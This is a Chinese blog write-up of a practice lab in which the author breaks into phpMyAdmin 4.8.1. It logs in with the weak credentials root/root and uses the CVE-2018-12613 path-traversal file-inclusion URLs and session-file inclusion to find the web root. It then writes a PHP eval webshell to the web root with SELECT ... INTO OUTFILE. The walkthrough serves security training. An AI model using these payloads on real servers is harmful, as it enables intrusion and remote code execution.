当前位置:网站首页>墨者学院-phpMyAdmin后台文件包含分析溯源
墨者学院-phpMyAdmin后台文件包含分析溯源
2022-07-04 07:40:00 【Lyswbb】
首先拿到题目到点击访问
访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器
账户密码:root root
点击sql模块 对sql语句进行一个查询
首先查询sql写一句话的权限
我们可以看到他的值为空
secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。
show global VARIABLES like '%secure%'
继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/
show VARIABLES like 'datadir'
接下来确认一下mysql权限,可以看到这里是最高权限root
SELECT USER();
权限和绝对路径都有了之后可以直接写入一句话了,先试一下phpinfo
select '<?php phpinfo(); ?>' into outfile '/var/lib/mysql/test.php';
当写进去之后访问失败,想了半天才发现这是mysql的路径,不是网站的绝对路径
继续想办法搞到网站的绝对路径 根据题目可知是通过文件包含的方式写一个phpinfo,通过泄漏的绝对路径来shell,思路有了,直接干
首先确定下数据库版本,该版本为4.8.1。在根据数据库版本历史漏洞查询关于文件包含的编号是CVE-2018-12613
直接利用payload进行包含就行了
http://124.70.71.251:40917/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
先写入一个phpinfo进数据库
select '<?php phpinfo();?>';
再通过文件包含去调用phpinfo
首先获取session的值,在构造参数去访问phpinfo,获取绝对路径
http://124.70.71.251:45548/index.phpindex.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_[value]
有了绝对路径之后就可以写入webshell了,写入之后直接访问1.php
select "<?php @eval($_POST['cmd']) ?>" into outfile "/var/www/html/1.php";
使用管理工具登陆上去后到根下面直接去找key.txt 或者 find / -name key.txt
边栏推荐
- L1-030 one gang one (15 points)
- Devops Practice Guide - reading notes (long text alarm)
- Electronic Association C language level 1 35, bank interest
- MySQL中的文本處理函數整理,收藏速查
- Basic DOS commands
- NLP literature reading summary
- Enter the year, month, and determine the number of days
- Unity 从Inspector界面打开资源管理器选择并记录文件路径
- SQL注入测试工具之Sqli-labs下载安装重置数据库报错解决办法之一(#0{main}thrown in D:\Software\phpstudy_pro\WWW\sqli-labs-……)
- window上用.bat文件启动项目
猜你喜欢
Heap concept in JVM
BasicVSR++: Improving Video Super-Resolutionwith Enhanced Propagation and Alignment
Rhcsa the next day
"Sword finger offer" 2nd Edition - force button brush question
JVM中堆概念
Blog stop statement
Transition technology from IPv4 to IPv6
Computer connects raspberry pie remotely through putty
Valentine's Day is coming! Without 50W bride price, my girlfriend was forcibly dragged away...
Book list | as the technical support Party of the Winter Olympics, Alibaba cloud's technology is written in these books!
随机推荐
User login function: simple but difficult
Unity opens the explorer from the inspector interface, selects and records the file path
[kubernetes series] kubesphere is installed on kubernetes
How to write a summary of the work to promote the implementation of OKR?
论文学习——基于极值点特征的时间序列相似性查询方法
2022-021ARTS:下半年開始
2022-021rts: from the second half of the year
Linear algebra 1.1
PCIE知识点-010:PCIE 热插拔资料从哪获取
两年前美国芯片扭捏着不卖芯片,如今芯片堆积如山祈求中国帮忙
在所有SwiftUI版本(1.0-4.0)中原生实现Charts图表视图之思路
NLP literature reading summary
手写简易版flexible.js以及源码分析
Easy to understand: understand the time series database incluxdb
BasicVSR++: Improving Video Super-Resolutionwith Enhanced Propagation and Alignment
MySQL中的文本處理函數整理,收藏速查
How does dataframe calculate the average value of each row as another column
Chain ide -- the infrastructure of the metauniverse
The cloud native programming challenge ended, and Alibaba cloud launched the first white paper on application liveliness technology in the field of cloud native
BibTex中参考文献种类